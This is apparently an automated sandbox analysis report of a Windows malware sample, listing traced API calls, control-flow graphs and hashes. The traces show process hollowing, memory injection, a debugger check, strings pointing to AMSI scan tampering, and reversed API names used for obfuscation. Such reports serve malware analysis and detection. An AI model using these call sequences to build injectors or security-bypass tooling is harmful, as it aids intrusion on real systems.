                                                                                                                      • Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814
                                                                                                                    • GetThreadContext.KERNEL32(000008A0,02E17424,ScanString,02E173A8,02DAA93C,UacInitialize,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,UacInitialize,02E173A8), ref: 02DA9602
                                                                                                                      • Part of subcall function 02DA8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471
                                                                                                                      • Part of subcall function 02DA8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5
                                                                                                                      • Part of subcall function 02DA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                    • API String ID: 3386062106-51457883
                                                                                                                    • Opcode ID: 4b860c16887d17da15e5c9e5069f58c516d43f1208819d1adee6486780860a9a
                                                                                                                    • Instruction ID: 8883cd0da0990b1b3099f0673774638ff9c4b19126ead4baafafa03f7370b2d0
                                                                                                                    • Opcode Fuzzy Hash: 4b860c16887d17da15e5c9e5069f58c516d43f1208819d1adee6486780860a9a
                                                                                                                    • Instruction Fuzzy Hash: F3E2E975A401589FDF11EB64DC90ECFB3BAFF85700F9042A5A409AB315DA30AE86DF61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 10945 2d95acc-2d95b0d GetModuleFileNameA RegOpenKeyExA 10946 2d95b4f-2d95b92 call 2d95908 RegQueryValueExA 10945->10946 10947 2d95b0f-2d95b2b RegOpenKeyExA 10945->10947 10952 2d95b94-2d95bb0 RegQueryValueExA 10946->10952 10953 2d95bb6-2d95bd0 RegCloseKey 10946->10953 10947->10946 10948 2d95b2d-2d95b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2d95bd8-2d95c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2d95c0f-2d95c13 10950->10954 10955 2d95cf2-2d95cf9 10950->10955 10952->10953 10956 2d95bb2 10952->10956 10958 2d95c1f-2d95c35 lstrlenA 10954->10958 10959 2d95c15-2d95c19 10954->10959 10956->10953 10960 2d95c38-2d95c3b 10958->10960 10959->10955 10959->10958 10961 2d95c3d-2d95c45 10960->10961 10962 2d95c47-2d95c4f 10960->10962 10961->10962 10964 2d95c37 10961->10964 10962->10955 10963 2d95c55-2d95c5a 10962->10963 10965 2d95c5c-2d95c82 lstrcpynA LoadLibraryExA 10963->10965 10966 2d95c84-2d95c86 10963->10966 10964->10960 10965->10966 10966->10955 10967 2d95c88-2d95c8c 10966->10967 10967->10955 10968 2d95c8e-2d95cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2d95cc0-2d95cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D90000,02DBE790), ref: 02D95AE8
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B06
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B24
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D95B42
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D95B8B
                                                                                                                    • RegQueryValueExA.ADVAPI32(?,02D95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001), ref: 02D95BA9
                                                                                                                    • RegCloseKey.ADVAPI32(?,02D95BD8,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D95BCB
                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D95BE8
                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D95BF5
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D95BFB
                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D95C26
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95C6D
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95C7D
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95CA5
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95CB5
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D95CDB
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D95CEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                    • Opcode ID: 192f5616dc0f1ae3a86b6f9ec3a2a24bf570381eb8c9aaa903b604d4b51fe63c
                                                                                                                    • Instruction ID: 098bae84c14ea56c3702812831771906d6a5336ac201a566b0198cba887f158a
                                                                                                                    • Opcode Fuzzy Hash: 192f5616dc0f1ae3a86b6f9ec3a2a24bf570381eb8c9aaa903b604d4b51fe63c
                                                                                                                    • Instruction Fuzzy Hash: B8516F71A4025D7AFF26D6A4AC46FEF77ADDB04744F8041B1BA04E6281EA74DE44CFA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 13205 2da894c-2da8971 LoadLibraryW 13206 2da89bb-2da89c1 13205->13206 13207 2da8973-2da898b GetProcAddress 13205->13207 13208 2da898d-2da89ac call 2da7d78 13207->13208 13209 2da89b0-2da89b6 FreeLibrary 13207->13209 13208->13209 13212 2da89ae 13208->13212 13209->13206 13212->13209
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6
                                                                                                                      • Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                    • Opcode ID: 44b73617091b32bdfc8ac8e12d923b84ee953e6f7ca318e9005fa4dc3c4d30dc
                                                                                                                    • Instruction ID: cc081a8e6a5925bd5d2caa4533694a67f308e6729e61637f91f9a87abc0d9af5
                                                                                                                    • Opcode Fuzzy Hash: 44b73617091b32bdfc8ac8e12d923b84ee953e6f7ca318e9005fa4dc3c4d30dc
                                                                                                                    • Instruction Fuzzy Hash: 0DF037B1EC1254AEE710AE6AA849F56F7ACE785F14F40097ABD0A87240C7715C90CBA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 13222 2daf744-2daf75e GetModuleHandleW 13223 2daf78a-2daf792 13222->13223 13224 2daf760-2daf772 GetProcAddress 13222->13224 13224->13223 13225 2daf774-2daf784 CheckRemoteDebuggerPresent 13224->13225 13225->13223 13226 2daf786 13225->13226 13226->13223
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase), ref: 02DAF754
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DAF766
                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DAF77D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                    • API String ID: 35162468-539270669
                                                                                                                    • Opcode ID: 8831fd2bf21d27a8a31eb8f748286d88cc428b8c5283e5b34a03af9ffcfc1132
                                                                                                                    • Instruction ID: 504f1ee3d0ee4f64bfedc7b9c76c98db64cc148f6d9afd134e41089bfc1b72dd
                                                                                                                    • Opcode Fuzzy Hash: 8831fd2bf21d27a8a31eb8f748286d88cc428b8c5283e5b34a03af9ffcfc1132
                                                                                                                    • Instruction Fuzzy Hash: B9F0A771904248BEEB10A7B88898BDCFBB99B05329F2447D0A435626C1E7724A84CAE1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E
                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDAB
                                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDDB
                                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DADDF0
                                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DADE1C
                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DADE25
                                                                                                                      • Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1897104825-0
                                                                                                                    • Opcode ID: 98081839e91b1d4d6f2f4c8ad98c953cd7420f322fe5aa2a22ee93ab2e7ffcfb
                                                                                                                    • Instruction ID: f072af1221ca82652dd061165b551fff0cef5b000d268c21ffaa57498ec9b9af
                                                                                                                    • Opcode Fuzzy Hash: 98081839e91b1d4d6f2f4c8ad98c953cd7420f322fe5aa2a22ee93ab2e7ffcfb
                                                                                                                    • Instruction Fuzzy Hash: C921CF71A50309BEEB51EAE4CC52FDEB7BDEB48700F500461B601F76C1DAB4AE058BA4

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DAE5F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                    • Opcode ID: 5fbda7b2db9802b0ae829179218fd2308cb23b39a0a5c1427970511c15655d13
                                                                                                                    • Instruction ID: ca9b14ce1840353341b73314a2af53dc4f81bf2091f288255e122b847f29b52e
                                                                                                                    • Opcode Fuzzy Hash: 5fbda7b2db9802b0ae829179218fd2308cb23b39a0a5c1427970511c15655d13
                                                                                                                    • Instruction Fuzzy Hash: 08414C35A10148AFEF10EBA8D850EDEB3BAEF88704F604835F041A7352DA74AD06CF65

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E
                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3764614163-0
                                                                                                                    • Opcode ID: 47d17816091fdd65fff7c7f4e74e308e7ee5fc54276fe4fc96fe61c5e3a3e4ab
                                                                                                                    • Instruction ID: 7f413db71d74676657275e6b4ba6a0d2ea18ce0be1cce791e1d70cc499768d44
                                                                                                                    • Opcode Fuzzy Hash: 47d17816091fdd65fff7c7f4e74e308e7ee5fc54276fe4fc96fe61c5e3a3e4ab
                                                                                                                    • Instruction Fuzzy Hash: 2421ED71A41209BEEB10EBA4DD52FDEB7BDEB04B00F614461B600F76C1D7B46E058B64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                    • API String ID: 4072585319-445027087
                                                                                                                    • Opcode ID: b39ad3166a790048bbe7154c17d21791ce488f737c1058f916a38abb39a95722
                                                                                                                    • Instruction ID: ed0f75415f1a18a57dc3cd561bccc0de8522fea94bde7abb75c5b0a19dd9cbe4
                                                                                                                    • Opcode Fuzzy Hash: b39ad3166a790048bbe7154c17d21791ce488f737c1058f916a38abb39a95722
                                                                                                                    • Instruction Fuzzy Hash: 36112D75684208BFEB04EFA4EC61EAEB7EDEB48B00F908461B905D7740D630AE558B74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                    • API String ID: 4072585319-445027087
                                                                                                                    • Opcode ID: 64b8f961a2b4a9771eb83ba6735d8f5de7ad7bd1136c25887b97eaceda2afcb3
                                                                                                                    • Instruction ID: aa8afab9e1e651bdbedd9e5c104bfa428eb3e8caef7a43937a1acaf4c27ef376
                                                                                                                    • Opcode Fuzzy Hash: 64b8f961a2b4a9771eb83ba6735d8f5de7ad7bd1136c25887b97eaceda2afcb3
                                                                                                                    • Instruction Fuzzy Hash: 7E112D75684208BFEB04EFA4EC61E9EB7ADEB48B00F908461B905D7740D630AE558B74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                    • API String ID: 2521977463-737317276
                                                                                                                    • Opcode ID: 8182e6c96b58f553aed0708a339efcd9850cea55f625e89c57e22570ed20f20e
                                                                                                                    • Instruction ID: fd10fc22a8b8e43eb7086327d4d9de08b9ae8ed445c095cbe89bc68a24abf294
                                                                                                                    • Opcode Fuzzy Hash: 8182e6c96b58f553aed0708a339efcd9850cea55f625e89c57e22570ed20f20e
                                                                                                                    • Instruction Fuzzy Hash: 45014075644208AFEB40EFA4EC51E9EB7EEFB49B00F514460F904D7700D774AD519B64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
